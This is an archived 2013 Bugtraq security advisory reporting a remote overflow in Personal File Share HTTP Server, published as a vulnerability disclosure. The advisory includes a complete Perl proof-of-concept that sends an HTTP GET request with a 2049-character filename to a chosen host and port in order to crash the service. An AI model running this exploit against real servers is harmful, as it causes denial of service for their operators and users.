lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-Id: <201304300809.r3U89bhY030255@sf01web1.securityfocus.com> Date: Tue, 30 Apr 2013 08:09:37 GMT From: demonalex@....com To: bugtraq@...urityfocus.com Subject: Personal File Share HTTP Server Remote Overflow Vulnerability Title: Personal File Share HTTP Server Remote Overflow Vulnerability Software : Personal File Share HTTP Server Software Version : UNKNOWN Vendor: http://www.srplab.com/ Vulnerability Published : 2013-04-28 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P) Bug Description : Personal file sharing is a convenient tool for sharing files with other mobile, tablet, or pc. It supports all web browsers. Other machines can browse or download files using web browser easily. This software is possible for remote attackers to send a request with GET command and a long string as filename under root dictionary that will lead to a Denial Of Service flaw for the HTTP service. Proof Of Concept : ----------------------------------------------------------- #!/usr/bin/perl -w #Personal File Share HTTP Server Remote Overflow Vulnerability Exploit #Written by demonalex@....com use IO::Socket; $|=1; $host=shift || die "$0 \$host \$port\n"; $port=shift || die "$0 \$host \$port\n"; $evil = 'A'x2049; $payload = "GET /"."$evil"." HTTP/1.0\r\n". "Accept: */*\r\n". "Accept-Language: zh-cn\r\n". "UA-CPU: x86\r\n". "Accept-Encoding: gzip, deflate\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; 360SE)\r\n". "Host: "."$host:$port"."\r\n". "Connection: Keep-Alive\r\n\r\n"; print "Launch Attack ... "; $sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n"; if(defined($sock1)){ $sock1->send("$payload", 0); $sock1->close; } print "Finish!\n"; exit(1); ----------------------------------------------------------- Credits : This vulnerability was discovered by demonalex(at)163(dot)com mail: demonalex(at)163(dot)com / ChaoYi.Huang@...nect.polyu.hk Independent Researcher DBAPPSecurity Co.,Ltd./Hong Kong PolyU
Powered by blists - more mailing lists